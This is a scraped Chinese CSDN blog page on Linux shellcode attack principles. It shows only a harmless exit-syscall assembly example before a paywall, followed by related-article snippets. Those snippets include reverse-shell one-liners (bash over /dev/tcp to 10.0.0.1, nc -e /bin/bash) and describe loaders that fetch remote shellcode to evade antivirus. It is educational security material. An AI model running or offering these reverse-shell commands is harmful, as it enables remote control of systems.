Linux ShellCode远程攻击原理

最新推荐文章于 2024-08-22 00:44:11 发布
最新推荐文章于 2024-08-22 00:44:11 发布
阅读量1.9k 收藏
点赞数
分类专栏: GNU/Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/X_White/article/details/8619885
版权
本文探讨了Linux ShellCode远程攻击的原理,通过分析exit系统调用的C代码和汇编转换,以及如何利用execve系统调用创建新shell。同时提到了防御策略,如服务器端使用ptrace跟踪来抵御此类攻击。
摘要由CSDN通过智能技术生成

这里就以exit 系统调用为例

首先编写C代码,在GDB中使用 disass _exit 反汇编exit 函数,之后迁移为汇编代码。

section .text
global _start
_start:
xor eax, eax
xor ebx, ebx
mov al, 0x01
int 0x80

之后只用如下nasm 进行汇编, ld 进行连接,生成可执行文件 
nasm -f elf exit.asm
ld exit.o -o exit
exit
中间可能由于系统问题导致如下问题: 

[root@localhost home]# ld exit.o -o exit.
ld: i386 architecture of input file `exit.o' is incompatible with i386:x86-64 output

这里详见nasm 参数列表 nasm -hf 

    elf32     ELF32 (i386) object files (e.g. Linux)
    elf       ELF (short name for ELF32)
    elf64     ELF64 (x86_64) object files (e.g. Linux)
然后用elf64即可,这里需要和你的系统相匹配,具体可以用uname -a 查看 

[root@localhost home]# nasm -
最低0.47元/天 解锁文章
X-Wyatt
关注
专栏目录
免杀专题(一)shellcode原理
weixin_47224111的博客
12-30 3881
免杀专题(一)shellcode原理 基本概念 一段16进制的机器码,可在暂存器eip溢出后,塞入一段可让cpu执行的shellcode机器码,让电脑可以执行攻击者的任意指令。 原理 因为shellcode一般为一段汇编代码,不依赖任何编译环境,也不能像编写代码一样,调用api函数名称来实现功能。它通过主动查找dll基址并动态获取api地址的方式来实现api调用。 Kernel32.dll控制着系统的内存管理、数据的输入输出操作和中断处理。 shellcode分为两个模块,基本模块和功能模块 基本模块 用
Shellcode攻击实验
Atlas2013的专栏
10-18 3654
首先,先要知道什么是shellcodeShellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。详见维基百科shellcode介绍:http://en.wikipedia.org/wiki/Shellcode
Shellcode原理及编写
热门推荐
maotoula的专栏
01-19 6万+
1.shellcode原理
WEB渗透免杀篇-cshot远程shellcode
qq_59468567的博客
08-21 300
C_Shot是一种用C语言编写的攻击性安全工具,旨在通过HTTP / HTTPS下载远程shellcode二进制文件(.bin),注入并执行shellcode。1.shellcode注入其自己的进程 2.使用父进程欺骗将shellcode注入子进程 使用C_Shot之类的工具的好处是,我们要执行的恶意代码没有存储在二进制文件中,而是从远程位置检索,读入内存然后执行。对于本文中的所有示例,我将使用github托管shellcode。分阶段和无阶段的shellcode在使用欺骗父进程方法时都可以绕过av。
远程执行shellcode
aod83029的博客
06-13 486
#include "Windows.h" #include <WinSock2.h> #include <stdio.h> #pragma comment(lib,"WS2_32.lib") int shellcode_execute() { WSADATA wsData; if(WSAStartup...
C/C++ 远程ShellCode执行工具
CSDN
07-21 1万+
通过开发一组远程代码执行盒,可以动态实现对ShellCode代码的动态载入,由于ShellCode不存放在本地客户端常量区,所以在一定程度上可以减少被杀概率,客户端只保留之基本的Socket通信功能,当需要时才会加载恶意代码运行。此工具分为服务端与客户端,客户端可以将其加入到开机自启动列表,并传入响应的参数即可,目前支持TCP/UDP/HTTP三种协议传输,后期可能会增加ICMP等来实现后门的传输工作。
selinux攻击shellcode
05-22
该漏洞允许远程攻击者通过精心构造的请求触发缓冲区溢出,从而可能执行任意代码,即shellcode。这个漏洞是由于在处理某些类型的内容编码时,Apache的mod_deflate模块存在边界检查错误。 **当讨论SELinuxshellcode...
Shellcode
weixin_43916678的博客
07-07 9028
shellcode简介 shellcode是一段用于利用软件漏洞而执行的代码,也可以认为是一段填充数据,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。 可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。 下面这张图就是shellcode工作流程,从功能上看,shellcode在整个漏洞利用过程中发挥主要作用就是对计算机端的控制。 shellcode可以按照攻击者执行的位置分为本地s
Linux系统下的远程缓冲区溢出攻击与防护策略
"远程缓冲区溢出攻击及防护 (2010年)",这篇论文主要探讨了Linux系统下的缓冲区溢出攻击原理以及如何防范远程shellcode攻击。作者通过介绍缓冲区溢出的机制,详细阐述了shellcode的编写过程,从C代码到机器码的转换...
远程线程shellcode注入
ndl1302732的专栏
10-11 2322
高手请飘过~~~~~~~~~~~~~~~~~~~~~~~~~~~          前一篇文章,写到了利用远程线程注入DLL,其原理是利用LoadLibaray把DLL加载进去,这种方式注入简单,但是会在对方进程加载一个模块。人家用工具一看,多了个模块,就知道被搞了。。。           今天写下用远程线程注入shellcode, 注入shellcode的难点是,注入的代码不能访问绝对地址...
基于Linux远程控制shell方式的原理与实现.pdf
09-06
基于Linux远程控制shell方式的原理与实现.pdf
linuxshell编程技术原理
03-06
这是《linux0.01内核分析与操作系统设计》的第10章部分源代码,所有代码已在ubuntu上成功编译,对于学习linuxshell编程还是很有意思的, 内容涉及到了文件操作,管道,重定向等。对于C语言的学习很有帮助。
linux+反弹shell原理,linux反弹shell原理详解
weixin_39778582的博客
05-13 277
完整命令反弹shell命令:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1bash -i > /dev/tcp/ip/port 0>&1 2>&1利用nc反弹shell:nc -lvvp 12345 -t -e /bin/bash原理bash -i > /dev/tcp/ip/port 0>&a...
《网络攻击与防御》 Linux攻击实验(4)
CSDNfengwang的博客
02-21 699
理解Linux操作系统的安全体系结构与机制,掌握Linux远程安全攻防技术,掌握Linux操作系统网络服务漏洞攻击过程,并学习如何利用metasploit对Linux操作系统进行简单的攻击及提权。远程获取Metasploitable2-Linux的shadow文件和passwd文件内容;使用generic/shell_reverse_tcp的PAYLOAD来连接远程主机;远程获取Metasploitable2-Linux的root帐户权限;/etc/shadow:储存了系统中的各个用户的密码信息。
利用缓存区漏洞执行shellcode
qq_38919714的博客
02-03 1793
环境:win10 工具:vc++6 原理介绍:  栈溢出,C语言中gets()、strcpy()等函数未进行数据长度的限定,在栈内写入超出长度限制的数据,从而破坏程序运行甚至获得系统控制权的攻击手段。几个常见的寄存器,ebp栈底指针,esp栈顶指针,eip下一条计算机执行的指令,计算机中真正的存储方式如下图:   原理介绍:eip寄存器里存储的是CPU下次要执行的指令的地址。eip在内
跨站脚本攻击shellcode
wing 的专栏
01-13 1149
接下来讲述XSS  Shellcode 的调用。  何谓 Shellcode?这个名词曾经多次出现,包括平时经常能听到的 Expliot、 POC等,如果对这些概念还不够清晰,那么下面的解释你必要看一看。  【Shellcode】  所谓的 Shellcode,最初是溢出程序和蠕虫病毒的核心,实际上是指利用一个漏洞时所执行 的代码。在XSS跨站脚本中,是指由JavaS
深入剖析 Shellcode:下载、反弹 Shell 及代码示例
最新发布
m0_57836225的博客
08-22 858
将解析后的 Shellcode 复制到分配的内存中,并使用 `VirtualAlloc` 和 `memcpy` 函数将其加载到可执行内存区域。但需要注意的是,下载和使用未经授权的 Shellcode 可能存在法律风险,并且在实际环境中可能会对系统造成严重的安全威胁。在进行此操作时,需要确保对 MSF 的配置和使用有足够的了解,以避免潜在的安全风险和错误配置。如果在未经授权的情况下使用,可能构成非法的黑客活动,违反法律法规。例如,在设置监听时,需要选择合适的攻击模块和参数,以适应目标系统的环境和漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值